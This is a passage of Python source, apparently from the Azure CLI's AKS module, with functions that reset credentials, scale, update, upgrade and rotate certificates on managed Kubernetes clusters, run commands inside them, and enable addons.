    """Return a single managed cluster with empty-valued fields stripped."""
    managed_cluster = client.get(resource_group_name, name)
    cleaned = _remove_nulls([managed_cluster])
    return cleaned[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
                           reset_service_principal=False,
                           reset_aad=False,
                           service_principal=None,
                           client_secret=None,
                           aad_server_app_id=None,
                           aad_server_app_secret=None,
                           aad_client_app_id=None,
                           aad_tenant_id=None,
                           no_wait=False):
    """Reset either the service principal or the (legacy) AAD profile.

    Exactly one of ``--reset-service-principal`` / ``--reset-aad-profile``
    must be selected; each mode requires its own set of parameters.
    """
    ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='managed_clusters')
    # The two reset modes are mutually exclusive and one is mandatory.
    if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError(
            'usage error: --reset-service-principal | --reset-aad-profile')
    if reset_service_principal:
        if service_principal is None or client_secret is None:
            raise CLIError(
                'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
        sp_profile = ManagedClusterServicePrincipalProfile(
            client_id=service_principal, secret=client_secret
        )
        return sdk_no_wait(no_wait,
                           client.begin_reset_service_principal_profile,
                           resource_group_name,
                           name, sp_profile)
    # --reset-aad path: all three app parameters are mandatory; tenant is optional.
    if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
        raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
                       '--aad-server-app-secret SECRET [--aad-tenant-id ID]')
    aad_parameters = {
        'clientAppID': aad_client_app_id,
        'serverAppID': aad_server_app_id,
        'serverAppSecret': aad_server_app_secret,
        'tenantID': aad_tenant_id
    }
    return sdk_no_wait(no_wait,
                       client.begin_reset_aad_profile,
                       resource_group_name,
                       name, aad_parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
    """Scale the node count of one node pool on the managed cluster.

    An empty *nodepool_name* is accepted only for single-pool clusters,
    in which case the lone pool is selected implicitly.
    """
    instance = client.get(resource_group_name, name)
    pools = instance.agent_pool_profiles
    if len(pools) > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')
    # Pick the first pool whose name matches, or the lone pool when no
    # name was given.
    selected = next(
        (p for p in pools
         if p.name == nodepool_name or (nodepool_name == "" and len(pools) == 1)),
        None)
    if selected is None:
        raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
    if selected.enable_auto_scaling:
        raise CLIError(
            "Cannot scale cluster autoscaler enabled node pool.")
    selected.count = int(node_count)  # pylint: disable=no-member
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None,
               uptime_sla=False,
               no_uptime_sla=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               attach_acr=None,
               detach_acr=None,
               api_server_authorized_ip_ranges=None,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               windows_admin_password=None,
               enable_managed_identity=False,
               assign_identity=None,
               yes=False,
               no_wait=False,
               enable_azure_rbac=False,
               disable_azure_rbac=False):
    """Update mutable settings of an existing managed cluster.

    Fetches the cluster model, applies every requested change in place
    (autoscaler, SKU/uptime SLA, load balancer profile, authorized IP
    ranges, AAD, AHUB license, Windows password, identity migration,
    ACR attach/detach), and sends it back in a single PUT via
    ``_put_managed_cluster_ensuring_permission``.  At least one update
    flag must be supplied, otherwise the call is rejected up front.

    Returns ``None`` without updating when the requested autoscaler
    state is already in effect, or when the user declines the identity
    migration prompt.
    """
    # Resolve SDK model classes against the active API version.
    ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
                                      resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                      operation_group='managed_clusters')
    ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                             operation_group='managed_clusters')
    ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='managed_clusters')
    Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
        'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
        operation_group='managed_clusters')
    # Booleans sum to a count; exactly one autoscaler action may be chosen.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler
    update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
                                                          load_balancer_outbound_ips,
                                                          load_balancer_outbound_ip_prefixes,
                                                          load_balancer_outbound_ports,
                                                          load_balancer_idle_timeout)
    update_aad_profile = not (
        aad_tenant_id is None and aad_admin_group_object_ids is None and
        not enable_azure_rbac and not disable_azure_rbac)
    # Reject a no-op invocation: at least one update flag must be present.
    # pylint: disable=too-many-boolean-expressions
    if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
            not update_lb_profile and
            not attach_acr and
            not detach_acr and
            not uptime_sla and
            not no_uptime_sla and
            api_server_authorized_ip_ranges is None and
            not enable_aad and
            not update_aad_profile and
            not enable_ahub and
            not disable_ahub and
            not windows_admin_password and
            not enable_managed_identity and
            not assign_identity):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--load-balancer-managed-outbound-ip-count" or'
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or'
                       '"--load-balancer-outbound-ports" or'
                       '"--load-balancer-idle-timeout" or'
                       '"--attach-acr" or "--detach-acr" or'
                       '"--uptime-sla" or'
                       '"--no-uptime-sla" or '
                       '"--api-server-authorized-ip-ranges" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids" or '
                       '"--enable-ahub" or '
                       '"--disable-ahub" or '
                       '"--windows-admin-password" or '
                       '"--enable-managed-identity" or '
                       '"--assign-identity" or '
                       '"--enable-azure-rbac" or '
                       '"--disable-azure-rbac"')
    if not enable_managed_identity and assign_identity:
        raise CLIError(
            '--assign-identity can only be specified when --enable-managed-identity is specified')
    instance = client.get(resource_group_name, name)
    # For multi-agent pool, use the az aks nodepool command
    if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
                       'to update per node pool auto scaler settings')
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    # --- cluster autoscaler: enable / update / disable on the single pool ---
    if enable_cluster_autoscaler:
        if instance.agent_pool_profiles[0].enable_auto_scaling:
            # Already enabled: warn and bail out without touching the cluster.
            logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
        instance.agent_pool_profiles[0].enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
    if disable_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning(
                'Cluster autoscaler is already disabled for this node pool.')
            return None
        instance.agent_pool_profiles[0].enable_auto_scaling = False
        instance.agent_pool_profiles[0].min_count = None
        instance.agent_pool_profiles[0].max_count = None
    # if intention is to clear autoscaler profile
    if cluster_autoscaler_profile == {}:
        instance.auto_scaler_profile = {}
    # else profile is provided, update instance profile if it exists
    elif cluster_autoscaler_profile:
        # Merge into the existing profile, normalizing CLI-style dashed keys
        # to the SDK's underscore attribute names.
        instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
                                                    dict((key.replace("-", "_"), value)
                                                         for (key, value) in cluster_autoscaler_profile.items())) \
            if instance.auto_scaler_profile else cluster_autoscaler_profile
    subscription_id = get_subscription_id(cmd.cli_ctx)
    # --- resolve the identity used for ACR role assignments ---
    client_id = ""
    if _is_msi_cluster(instance):
        if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
        client_id = instance.identity_profile["kubeletidentity"].client_id
    else:
        client_id = instance.service_principal_profile.client_id
    if not client_id:
        raise CLIError('Cannot get the AKS cluster\'s service principal.')
    if attach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=attach_acr,
                        subscription_id=subscription_id)
    if detach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=detach_acr,
                        subscription_id=subscription_id,
                        detach=True)
    # --- uptime SLA (Paid vs Free tier) ---
    if uptime_sla and no_uptime_sla:
        raise CLIError(
            'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
    if uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    if no_uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Free"
        )
    if update_lb_profile:
        instance.network_profile.load_balancer_profile = update_load_balancer_profile(
            cmd,
            load_balancer_managed_outbound_ip_count,
            load_balancer_outbound_ips,
            load_balancer_outbound_ip_prefixes,
            load_balancer_outbound_ports,
            load_balancer_idle_timeout,
            instance.network_profile.load_balancer_profile)
    # empty string is valid as it disables ip whitelisting
    if api_server_authorized_ip_ranges is not None:
        instance.api_server_access_profile = \
            _populate_api_server_access_profile(
                cmd,
                api_server_authorized_ip_ranges, instance=instance)
    # --- managed AAD enable / profile update ---
    if enable_aad:
        if instance.aad_profile is not None and instance.aad_profile.managed:
            raise CLIError(
                'Cannot specify "--enable-aad" if managed AAD is already enabled')
        instance.aad_profile = ManagedClusterAADProfile(
            managed=True
        )
    if update_aad_profile:
        if instance.aad_profile is None or not instance.aad_profile.managed:
            raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
                           '"--enable-azure-rbac/--disable-azure-rbac"'
                           ' if managed AAD is not enabled')
        if aad_tenant_id is not None:
            instance.aad_profile.tenant_id = aad_tenant_id
        if aad_admin_group_object_ids is not None:
            # ids -> i_ds due to track 2 naming issue
            instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
                aad_admin_group_object_ids)
        if enable_azure_rbac and disable_azure_rbac:
            raise MutuallyExclusiveArgumentError(
                'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
        if enable_azure_rbac:
            instance.aad_profile.enable_azure_rbac = True
        if disable_azure_rbac:
            instance.aad_profile.enable_azure_rbac = False
    # --- Azure Hybrid User Benefit (Windows license type) ---
    if enable_ahub and disable_ahub:
        raise CLIError(
            'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'
    if disable_ahub:
        instance.windows_profile.license_type = 'None'
    if windows_admin_password:
        instance.windows_profile.admin_password = windows_admin_password
    # --- identity migration: SPN -> system/user assigned managed identity ---
    current_identity_type = "spn"
    if instance.identity is not None:
        current_identity_type = instance.identity.type.casefold()
    goal_identity_type = current_identity_type
    if enable_managed_identity:
        if not assign_identity:
            goal_identity_type = "systemassigned"
        else:
            goal_identity_type = "userassigned"
    if current_identity_type != goal_identity_type:
        # Migrating identity types is disruptive; confirm unless --yes.
        msg = ""
        if current_identity_type == "spn":
            msg = ('Your cluster is using service principal, and you are going to update '
                   'the cluster to use {} managed identity.\n After updating, your '
                   'cluster\'s control plane and addon pods will switch to use managed '
                   'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
                   'until you upgrade your agentpool.\n '
                   'Are you sure you want to perform this operation?').format(goal_identity_type)
        else:
            msg = ('Your cluster is already using {} managed identity, and you are going to '
                   'update the cluster to use {} managed identity. \nAre you sure you want to '
                   'perform this operation?').format(current_identity_type, goal_identity_type)
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        if goal_identity_type == "systemassigned":
            instance.identity = ManagedClusterIdentity(
                type="SystemAssigned"
            )
        elif goal_identity_type == "userassigned":
            # pylint: disable=line-too-long
            user_assigned_identity = {
                assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
            }
            instance.identity = ManagedClusterIdentity(
                type="UserAssigned",
                user_assigned_identities=user_assigned_identity
            )
    # --- flags for post-PUT role assignments handled by the helper ---
    monitoring_addon_enabled = False
    ingress_appgw_addon_enabled = False
    virtual_node_addon_enabled = False
    if instance.addon_profiles is not None:
        monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
            instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
        ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
            instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
        virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
            instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
                                    'Linux'].enabled
    return _put_managed_cluster_ensuring_permission(
        cmd,
        client,
        subscription_id,
        resource_group_name,
        name,
        instance,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        False,
        instance.agent_pool_profiles[0].vnet_subnet_id,
        _is_msi_cluster(instance),
        attach_acr,
        None,
        no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
                client,
                resource_group_name, name,
                kubernetes_version='',
                control_plane_only=False,
                node_image_only=False,
                no_wait=False,
                yes=False):
    """Upgrade a managed Kubernetes cluster, its node images, or both.

    :param kubernetes_version: Target Kubernetes version. '' re-applies the
        current version (useful to recover a cluster in a Failed state).
    :param control_plane_only: Upgrade only the control plane; node pools keep
        their current orchestrator version. Not supported on legacy clusters.
    :param node_image_only: Upgrade only the node image of every node pool;
        cannot be combined with kubernetes_version.
    :param yes: Skip confirmation prompts.
    :return: Result/poller of the update call, or None if the user declined
        a confirmation prompt.
    :raises CLIError: On conflicting flags or unsupported cluster types.
    """
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None

    instance = client.get(resource_group_name, name)

    # Availability-set (legacy) clusters constrain which upgrade modes work.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        # BUGFIX: the two literal fragments previously concatenated to
        # "clusterand"; a separating space has been added.
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # Node image upgrade requires VirtualMachineScaleSets; check once up
        # front instead of re-checking on every loop iteration.
        if vmas_cluster:
            raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                           'can only be applied on VirtualMachineScaleSets cluster.')
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        agent_pool_client = cf_agent_pools(cmd.cli_ctx)  # hoisted: loop-invariant
        for agent_pool_profile in instance.agent_pool_profiles:
            _upgrade_single_nodepool_image_version(True, agent_pool_client,
                                                   resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Kick off a node-image-only upgrade for one agent pool, optionally without waiting for completion."""
    return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version,
                       resource_group_name, cluster_name, nodepool_name)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
    """Invoke a command inside the managed cluster via the AKS run-command API
    and pretty-print its result.

    :param command_string: The command to run; must be non-empty.
    :param command_files: Optional files (or ["."] for the current folder) to
        ship alongside the command, see _get_command_context.
    :raises ValidationError: When command_string is empty.
    """
    colorama.init()

    # Validate input before making any service calls (previously the cluster
    # was fetched even when the command was empty).
    if not command_string:
        raise ValidationError('Command cannot be empty.')

    mc = client.get(resource_group_name, name)

    RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                       operation_group='managed_clusters')
    request_payload = RunCommandRequest(command=command_string)
    request_payload.context = _get_command_context(command_files)

    # If this cluster has Azure AD enabled, pass the current user's token so
    # the command also executes under the caller's identity. The token is
    # acquired for the AKS managed server AppID (same id for all clouds).
    if mc.aad_profile is not None and mc.aad_profile.managed:
        request_payload.cluster_token = _get_dataplane_aad_token(
            cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")

    commandResultFuture = client.begin_run_command(
        resource_group_name, name, request_payload, polling_interval=5, retry_total=0)

    # wait up to 300 seconds for the command to complete
    return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
    """Fetch the result of a previously issued run-command invocation and pretty-print it."""
    if not command_id:
        raise ValidationError('CommandID cannot be empty.')
    result = client.get_command_result(resource_group_name, name, command_id)
    return _print_command_result(cmd.cli_ctx, result)
def _print_command_result(cli_ctx, commandResult):
    """Render a run-command result for humans, unless an output format was requested.

    cli_ctx.data['safe_params'] holds the parameter names (without values) the
    user typed; CLI core also uses it to build the ParameterSetName header for
    every HTTP request.
    """
    safe_params = cli_ctx.data['safe_params']
    # the user asked for a specific output format: honor it and hand the raw
    # object back to the render pipeline
    if safe_params is None or "-o" in safe_params or "--output" in safe_params:
        return commandResult

    # no explicit format: print a human-friendly summary instead
    state = commandResult.provisioning_state
    if state == "Succeeded":
        # success: show exit code plus the captured logs
        print(
            f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
            f"finished at {commandResult.finished_at} "
            f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
        print(commandResult.logs)
        return
    if state == "Failed":
        # failure: surface the reason in red
        print(
            f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
        return
    # still in some *-ing state
    print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
    return None
def _get_command_context(command_files):
    """Package files to attach to a run-command invocation.

    :param command_files: List of file paths to attach, or ["."] to attach the
        whole current working directory (preserving its folder layout).
    :return: Base64-encoded zip archive of the attachments, or "" when there
        is nothing to attach.
    :raises ValidationError: When "." is combined with other entries, or a
        path is not a readable file.
    """
    if not command_files:
        return ""

    files_to_attach = {}  # maps os path -> zip entry name
    # "." means attach the current folder; it cannot be combined with more
    # files (at least for now).
    if len(command_files) == 1 and command_files[0] == ".":
        cwd = os.getcwd()
        for file_folder, _, files in os.walk(cwd):
            for file in files:
                # retain folder structure inside the archive
                rel = os.path.relpath(file_folder, cwd)
                files_to_attach[os.path.join(
                    file_folder, file)] = os.path.join(rel, file)
    else:
        for file in command_files:
            if file == ".":
                raise ValidationError(
                    ". is used to attach current folder, not expecting other attachments.")
            if os.path.isfile(file):
                # individually attached files are flattened into one folder
                files_to_attach[file] = os.path.basename(file)
            else:
                raise ValidationError(
                    f"{file} is not a valid file, or not accessible.")

    if len(files_to_attach) < 1:
        logger.debug("no files to attach!")
        return ""

    zip_stream = io.BytesIO()
    # context manager guarantees the archive trailer is written and the
    # ZipFile is closed even if an individual write fails
    with zipfile.ZipFile(zip_stream, "w") as zip_file:
        for os_file, zip_entry in files_to_attach.items():
            zip_file.write(os_file, zip_entry)
    return str(base64.encodebytes(zip_stream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
    """Acquire a raw AAD access token for the given server application id.

    Mostly copied from the keyvault CLI module.
    """
    import adal
    try:
        raw = Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)
        return raw[0][2].get('accessToken')
    except adal.AdalError as err:
        # pylint: disable=no-member
        expired = (hasattr(err, 'error_response') and
                   'error_description' in err.error_response and
                   'AADSTS70008:' in err.error_response['error_description'])
        if expired:
            raise CLIError(
                "Credentials have expired due to inactivity. Please run 'az login'")
        raise CLIError(err)
# Name and implementation module of the Azure Dev Spaces CLI extension,
# installed on demand by the use-dev-spaces / remove-dev-spaces commands below.
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
                       endpoint_type='Public', prompt=False):
    """
    Use Azure Dev Spaces with a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param update: Update to the latest Azure Dev Spaces client components.
    :type update: bool
    :param space_name: Name of the new or existing dev space to select. Defaults to an \
    interactive selection experience.
    :type space_name: String
    :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
    See https://aka.ms/azds-networking for more information.
    :type endpoint_type: String
    :param prompt: Do not prompt for confirmation. Requires --space.
    :type prompt: bool
    """
    # bail out silently if the extension could not be installed/updated
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
        return
    azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_use_dev_spaces(
            name, resource_group_name, update, space_name, endpoint_type, prompt)
    except TypeError:
        # an older extension exposes a different signature
        raise CLIError(
            "Use '--update' option to get the latest Azure Dev Spaces client components.")
    except AttributeError as ae:
        raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
    """
    Remove Azure Dev Spaces from a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param prompt: Do not prompt for confirmation.
    :type prompt: bool
    """
    # bail out silently if the extension could not be installed
    if not _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
        return
    azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
    try:
        azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
    except AttributeError as ae:
        raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
    """Rotate the certificates of a managed cluster; fire-and-forget by default (no_wait=True)."""
    return sdk_no_wait(
        no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   no_wait=False):
    """Enable or disable the given comma-separated addons on *instance*.

    Mutates the ManagedCluster model in place and returns it; the caller is
    responsible for sending the update to the service.

    :param addons: Comma-separated CLI addon names (keys of ADDONS).
    :param enable: True to enable the listed addons, False to disable them.
    :raises CLIError: On unknown addon names, or when enabling an addon that
        is already enabled / disabling one that is not installed.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    # parse the comma-separated addons argument
    addon_args = addons.split(',')

    addon_profiles = instance.addon_profiles or {}

    os_type = 'Linux'

    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type

        # honor addon names defined in Azure CLI
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)

        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(
                addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    # BUGFIX: a separating space was missing between the quoted
                    # command and 'before', rendering as '...monitoring"before...'.
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
                if not workspace_resource_id:
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                # normalize to a canonical ARM ID: leading slash, no trailing slash
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {
                    CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    # BUGFIX: this literal was missing its f-prefix, so the
                    # {resource_group_name} placeholder printed verbatim
                    # (the ingress-appgw message below already used f-strings).
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   f'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError(
                        'The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {
                    CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
                # only forward the appgw options the user actually supplied
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
